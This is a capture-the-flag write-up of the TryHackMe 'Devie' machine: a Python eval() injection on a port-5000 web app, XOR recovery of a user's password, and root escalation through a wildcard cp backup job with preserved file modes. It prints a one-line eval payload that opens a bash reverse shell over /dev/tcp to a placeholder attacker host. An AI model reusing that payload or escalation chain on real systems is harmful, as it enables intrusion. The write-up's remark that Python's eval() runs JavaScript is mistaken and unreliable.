{THM} Devie
Last updated
Last updated
Don't always trust what you can't see. This time, Iβm doing medium challenge on Linux machine and manage to learn preserving file which happen when Iβm trying to escalate root or give permission with copying the file or /usr/bin/bash.
As usual, we start with scanning the port. Interesting part here, no website server are up but port 5000 got something to see.
What its? Math formulas with huge of formula. Below this, they give source code. Let check the source code. It might be secure coding or crash code something related to it.
Examine the source code from app.py, found this dangerous function. Eval(). The eval() function evaluates JavaScript code represented as a string and returns its completion value. It is far too easy for a bad actor to run arbitrary code when you use eval().
Let exploit this with arbitrary code with reverse shell
__import__(βosβ).system(βbash -c 'bash -i >& /dev/tcp/machine/pport 0>&1'")
Manage to get reverse shell listening on our machine. This method also usable with CTF type challenge which is Pwn.
We got first flag here, next reading the note it mentions about encoded password with secure XOR format.
Unfortunately, we cannot read the source code due to file permissions belongs to root and Gordon.
Reading the sudo permission, we can read that file as Gordon without password.
sudo -u Gordon /usr/bin/python3 /opt/encrypt.py
Once we manage to execute that file, let put dummy password to encrypt and see how it work.
Workflow
encoded text from the script -> base 64 decode > xor decode with (secret key as the text we entered to be encoded ) -> the key used by Gordon to encode his password!
Since we know original password and encrypted one, let find the key being use.
Given the secret key, let put the encoded password given from notes and got the Gordon password.
We have access to Gordon and got second flag here. Next, we need to figure out how we can escalate the root. As usual, do some vertical search and horizontal search.
Brief understanding, whatever happen in backups or reports will be copy at it. But who source and who destination? That what I use pspy64.
Checking using pspy64, found hidden crontab that happen using /usr/bin/backup
Checking what it is doing, and finally found who source and who destination.
Since it uses wildcard, that mean it will copy anything being pass. But it cannot be reverse shell since it just read file (imtrying it return Gordon instead root).
Here I got problem about file, where it doesnβt pass exactly permission from reports to backups that make it unable to execute root. After looking at some notes in website, I found that, we need to put preserve=mode so that what file being copied also copied same timestamp, permission, and ownership.
Why βpreserve=mode, preserving file attributes: By default, the cp command copies files without preserving their attributes such as permissions, timestamps, and ownership. However, we can use the -p (or --preserve) option to preserve file attributes during the copy process.
Pwn CTF challenge in Vulnerable Machine
Preserving file bypass
